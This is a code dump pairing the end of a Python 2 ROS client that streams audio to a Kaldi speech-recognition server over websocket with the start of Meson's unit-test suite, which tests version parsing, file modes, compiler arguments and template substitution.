def __init__(self, audiofile, url, protocols=None, extensions=None, heartbeat_freq=None, byterate=32000,
save_adaptation_state_filename=None, send_adaptation_state_filename=None):
super(KaldiRosClient, self).__init__(url, protocols, extensions, heartbeat_freq)
self.final_hyps = []
self.audiofile = audiofile
self.byterate = byterate
self.final_hyp_queue = Queue.Queue()
self.save_adaptation_state_filename = save_adaptation_state_filename
self.send_adaptation_state_filename = send_adaptation_state_filename
@rate_limited(30)
def send_data(self, data):
self.send(data, binary=True)
def opened(self):
rospy.loginfo(">>> Socket connection is open now")
def send_data_to_ws():
if self.send_adaptation_state_filename is not None:
rospy.loginfo(">>> Sending adaptation state from %s" % self.send_adaptation_state_filename)
try:
adaptation_state_props = json.load(open(self.send_adaptation_state_filename, "r"))
self.send(json.dumps(dict(adaptation_state=adaptation_state_props)))
except:
e = sys.exc_info()[0]
rospy.logerr(">>> Failed to send adaptation state: %s", str(e))
with self.audiofile as audiostream:
for block in iter(lambda: audiostream.read(self.byterate / 4), ""):
self.send_data(block)
rospy.logdebug(">>> Audio sent, now sending EOS")
self.send("EOS")
t = threading.Thread(target=send_data_to_ws)
t.start()
def received_message(self, m):
response = json.loads(str(m))
if response['status'] == 0:
if 'result' in response:
trans = response['result']['hypotheses'][0]['transcript']
if response['result']['final']:
# print >> sys.stderr, trans,
# self.final_hyps.append(trans)
rospy.loginfo(trans.replace("\n", "\\n"))
else:
print_trans = trans.replace("\n", "\\n")
if len(print_trans) > 80:
print_trans = "... %s" % print_trans[-76:]
if 'adaptation_state' in response:
if self.save_adaptation_state_filename:
print >> sys.stderr, "Saving adaptation state to %s" % self.save_adaptation_state_filename
with open(self.save_adaptation_state_filename, "w") as f:
f.write(json.dumps(response['adaptation_state']))
else:
rospy.logerr("Received error from server (status %d)" % response['status'])
if 'message' in response:
rospy.logerr(">>> Error message:", response['message'])
def get_full_hyp(self, timeout=60):
return self.final_hyp_queue.get(timeout)
def closed(self, code, reason=None):
self.final_hyp_queue.put(" ".join(self.final_hyps))
def main():
rospy.init_node('kaldi_ros')
parser = argparse.ArgumentParser(description='Command line client for kaldigstserver')
parser.add_argument('-u', '--uri', default="ws://localhost:8181/client/ws/speech", dest="uri",
help="Server websocket URI")
parser.add_argument('-r', '--rate', default=32000, dest="rate", type=int,
help="Rate in bytes/sec at which audio should be sent to the server. NB! For raw 16-bit audio it must be 2*samplerate!")
parser.add_argument('--save-adaptation-state', help="Save adaptation state to file")
parser.add_argument('--send-adaptation-state', help="Send adaptation state from file")
parser.add_argument('--content-type', default='',
help="Use the specified content type (empty by default, for raw files the default is audio/x-raw, layout=(string)interleaved, rate=(int)<rate>, format=(string)S16LE, channels=(int)1")
parser.add_argument('audiofile', help="Audio file to be sent to the server", type=argparse.FileType('rb'),
default=sys.stdin)
args = parser.parse_args()
content_type = args.content_type
if content_type == '' and args.audiofile.name.endswith(".raw"):
content_type = "audio/x-raw, layout=(string)interleaved, rate=(int)%d, format=(string)S16LE, channels=(int)1" % (
args.rate / 2)
ws = KaldiRosClient(args.audiofile, args.uri + '?%s' % (urllib.urlencode([("content-type", content_type)])),
byterate=args.rate,
save_adaptation_state_filename=args.save_adaptation_state,
send_adaptation_state_filename=args.send_adaptation_state)
ws.connect()
rospy.spin()
if __name__ == "__main__":
main()
|
run_unittests.py | #!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg, relpath
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
@contextmanager
def chdir(path: str):
curdir = os.getcwd()
os.chdir(path)
yield
os.chdir(curdir)
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
def new_which(cmd, *kwargs):
if cmd == 'pkg-config':
return None
return old_which(cmd, *kwargs)
shutil.which = new_which
ExternalProgram._search = new_search
try:
yield
finally:
shutil.which = old_which
ExternalProgram._search = old_search
class InternalTests(unittest.TestCase):
def test_version_number(self):
searchfunc = mesonbuild.environment.search_version
self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3')
self.assertEqual(searchfunc('foobar 2016.10.128'), 'unknown version')
self.assertEqual(searchfunc('2016.10.128'), 'unknown version')
def test_mode_symbolic_to_bits(self):
modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits
self.assertEqual(modefunc('---------'), 0)
self.assertEqual(modefunc('r--------'), stat.S_IRUSR)
self.assertEqual(modefunc('---r-----'), stat.S_IRGRP)
self.assertEqual(modefunc('------r--'), stat.S_IROTH)
self.assertEqual(modefunc('-w-------'), stat.S_IWUSR)
self.assertEqual(modefunc('----w----'), stat.S_IWGRP)
self.assertEqual(modefunc('-------w-'), stat.S_IWOTH)
self.assertEqual(modefunc('--x------'), stat.S_IXUSR)
self.assertEqual(modefunc('-----x---'), stat.S_IXGRP)
self.assertEqual(modefunc('--------x'), stat.S_IXOTH)
self.assertEqual(modefunc('--S------'), stat.S_ISUID)
self.assertEqual(modefunc('-----S---'), stat.S_ISGID)
self.assertEqual(modefunc('--------T'), stat.S_ISVTX)
self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR)
self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP)
self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH)
self.assertEqual(modefunc('rwx------'), stat.S_IRWXU)
self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG)
self.assertEqual(modefunc('------rwx'), stat.S_IRWXO)
# We could keep listing combinations exhaustively but that seems
# tedious and pointless. Just test a few more.
self.assertEqual(modefunc('rwxr-xr-x'),
stat.S_IRWXU |
stat.S_IRGRP | stat.S_IXGRP |
stat.S_IROTH | stat.S_IXOTH)
self.assertEqual(modefunc('rw-r--r--'),
stat.S_IRUSR | stat.S_IWUSR |
stat.S_IRGRP |
stat.S_IROTH)
self.assertEqual(modefunc('rwsr-x---'),
stat.S_IRWXU | stat.S_ISUID |
stat.S_IRGRP | stat.S_IXGRP)
def test_compiler_args_class(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
cc = mesonbuild.compilers.CCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock())
# Test that empty initialization works
a = cargsfunc(cc)
self.assertEqual(a, [])
# Test that list initialization works
a = cargsfunc(cc, ['-I.', '-I..'])
self.assertEqual(a, ['-I.', '-I..'])
# Test that there is no de-dup on initialization
self.assertEqual(cargsfunc(cc, ['-I.', '-I.']), ['-I.', '-I.'])
## Test that appending works
a.append('-I..')
self.assertEqual(a, ['-I..', '-I.'])
a.append('-O3')
self.assertEqual(a, ['-I..', '-I.', '-O3'])
## Test that in-place addition works
a += ['-O2', '-O2']
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2'])
# Test that removal works
a.remove('-O2')
self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2'])
# Test that de-dup happens on addition
a += ['-Ifoo', '-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# .extend() is just +=, so we don't test it
## Test that addition works
# Test that adding a list with just one old arg works and yields the same array
a = a + ['-Ifoo']
self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2'])
# Test that adding a list with one arg new and one old works
a = a + ['-Ifoo', '-Ibaz']
self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2'])
# Test that adding args that must be prepended and appended works
a = a + ['-Ibar', '-Wall']
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
## Test that reflected addition works
# Test that adding to a list with just one old arg works and yields the same array
a = ['-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall'])
# Test that adding to a list with just one new arg that is not pre-pended works
a = ['-Werror'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with two new args preserves the order
a = ['-Ldir', '-Lbah'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
# Test that adding to a list with old args does nothing
a = ['-Ibar', '-Ibaz', '-Ifoo'] + a
self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall'])
## Test that adding libraries works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Adding a library and a libpath appends both correctly
l += ['-Lbardir', '-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
# Adding the same library again does nothing
l += ['-lbar']
self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar'])
## Test that 'direct' append and extend works
l = cargsfunc(cc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l, ['-Lfoodir', '-lfoo'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a'])
def test_compiler_args_class_gnuld(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
# Direct-adding a library and a libpath appends both correctly
l.extend_direct(['-Lbardir', '-lbar'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group'])
# Direct-adding the same library again still adds it
l.append_direct('-lbar')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group'])
# Direct-adding with absolute path deduplicates
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding libbaz again does nothing
l.append_direct('/libbaz.a')
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group'])
# Adding a non-library argument doesn't include it in the group
l += ['-Lfoo', '-Wl,--export-dynamic']
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic'])
# -Wl,-lfoo is detected as a library and gets added to the group
l.append('-Wl,-ldl')
self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group'])
def test_compiler_args_remove_system(self):
cargsfunc = mesonbuild.compilers.CompilerArgs
## Test --start/end-group
linker = mesonbuild.linkers.GnuDynamicLinker([], MachineChoice.HOST, 'fake', '-Wl,', [])
gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker)
## Ensure that the fake compiler is never called by overriding the relevant function
gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include']
## Test that 'direct' append and extend works
l = cargsfunc(gcc, ['-Lfoodir', '-lfoo'])
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group'])
## Test that to_native removes all system includes
l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include']
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1'])
def test_string_templates_substitution(self):
dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict
substfunc = mesonbuild.mesonlib.substitute_values
ME = mesonbuild.mesonlib.MesonException
# Identity
self.assertEqual(dictfunc([], []), {})
# One input, no outputs
inputs = ['bar/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:])
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
# One input, one output
inputs = ['bar/foo.c.in']
outputs = ['out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@.out', '@OUTPUT@', 'strings']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out'] + outputs + cmd[2:])
cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@']
self.assertEqual(substfunc(cmd, d),
[inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs)
cmd = ['@INPUT@', '@BASENAME@.hah', 'strings']
self.assertEqual(substfunc(cmd, d),
inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:])
# One input, one output with a subdir
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0],
'@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c',
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Two inputs, no outputs
inputs = ['bar/foo.c.in', 'baz/foo.c.in']
outputs = []
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@INPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[1:])
cmd = ['@INPUT0@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:])
cmd = ['@INPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
cmd = ['@INPUT0@', '@INPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), inputs + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Too many inputs
cmd = ['@PLAINNAME@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@BASENAME@']
self.assertRaises(ME, substfunc, cmd, d)
# No outputs
cmd = ['@OUTPUT@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTPUT0@']
self.assertRaises(ME, substfunc, cmd, d)
cmd = ['@OUTDIR@']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, one output
outputs = ['dir/out.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Two inputs, two outputs
outputs = ['dir/out.c', 'dir/out2.c']
ret = dictfunc(inputs, outputs)
d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1],
'@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1],
'@OUTDIR@': 'dir'}
# Check dictionary
self.assertEqual(ret, d)
# Check substitutions
cmd = ['some', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), cmd)
cmd = ['@OUTPUT@', 'ordinary', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[1:])
cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings']
self.assertEqual(substfunc(cmd, d), outputs + cmd[2:])
cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@']
self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir'])
# Many inputs, can't use @INPUT@ like this
cmd = ['@INPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough inputs
cmd = ['@INPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Not enough outputs
cmd = ['@OUTPUT2@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
# Many outputs, can't use @OUTPUT@ like this
cmd = ['@OUTPUT@.out', 'ordinary', 'strings']
self.assertRaises(ME, substfunc, cmd, d)
def test_needs_exe_wrapper_override(self):
config = ConfigParser()
config['binaries'] = {
'c': '\'/usr/bin/gcc\'',
}
config['host_machine'] = {
'system': '\'linux\'',
'cpu_family': '\'arm\'',
'cpu': '\'armv7\'',
'endian': '\'little\'',
}
# Can not be used as context manager because we need to
# open it a second time and this is not possible on
# Windows.
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.flush()
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
detected_value = env.need_exe_wrapper()
os.unlink(configfilename)
desired_value = not detected_value
config['properties'] = {
'needs_exe_wrapper': 'true' if desired_value else 'false'
}
configfile = tempfile.NamedTemporaryFile(mode='w+', delete=False)
configfilename = configfile.name
config.write(configfile)
configfile.close()
opts = get_fake_options()
opts.cross_file = (configfilename,)
env = get_fake_env(opts=opts)
forced_value = env.need_exe_wrapper()
os.unlink(configfilename)
self.assertEqual(forced_value, desired_value)
def test_listify(self):
listify = mesonbuild.mesonlib.listify
# Test sanity
self.assertEqual([1], listify(1))
self.assertEqual([], listify([]))
self.assertEqual([1], listify([1]))
# Test flattening
self.assertEqual([1, 2, 3], listify([1, [2, 3]]))
self.assertEqual([1, 2, 3], listify([1, [2, [3]]]))
self.assertEqual([1, [2, [3]]], listify([1, [2, [3]]], flatten=False))
# Test flattening and unholdering
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
self.assertEqual([holder1], listify(holder1))
self.assertEqual([holder1], listify([holder1]))
self.assertEqual([holder1, 2], listify([holder1, 2]))
self.assertEqual([holder1, 2, 3], listify([holder1, 2, [3]]))
def test_unholder(self):
unholder = mesonbuild.mesonlib.unholder
holder1 = ObjectHolder(1)
holder3 = ObjectHolder(3)
holders = [holder1, holder3]
self.assertEqual(1, unholder(holder1))
self.assertEqual([1], unholder([holder1]))
self.assertEqual([1, 3], unholder(holders))
def test_extract_as_list(self):
extract = mesonbuild.mesonlib.extract_as_list
# Test sanity
kwargs = {'sources': [1, 2, 3]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
self.assertEqual(kwargs, {'sources': [1, 2, 3]})
self.assertEqual([1, 2, 3], extract(kwargs, 'sources', pop=True))
self.assertEqual(kwargs, {})
# Test unholding
holder3 = ObjectHolder(3)
kwargs = {'sources': [1, 2, holder3]}
self.assertEqual(kwargs, {'sources': [1, 2, holder3]})
# flatten nested lists
kwargs = {'sources': [1, [2, [3]]]}
self.assertEqual([1, 2, 3], extract(kwargs, 'sources'))
def test_pkgconfig_module(self):
class Mock:
pass
dummystate = Mock()
dummystate.subproject = 'dummy'
mock = Mock()
mock.pcdep = Mock()
mock.pcdep.name = "some_name"
mock.version_reqs = []
# pkgconfig dependency as lib
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_libs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
# pkgconfig dependency as requires
deps = mesonbuild.modules.pkgconfig.DependenciesHelper(dummystate, "thislib")
deps.add_pub_reqs([mock])
self.assertEqual(deps.format_reqs(deps.pub_reqs), "some_name")
def _test_all_naming(self, cc, env, patterns, platform):
shr = patterns[platform]['shared']
stc = patterns[platform]['static']
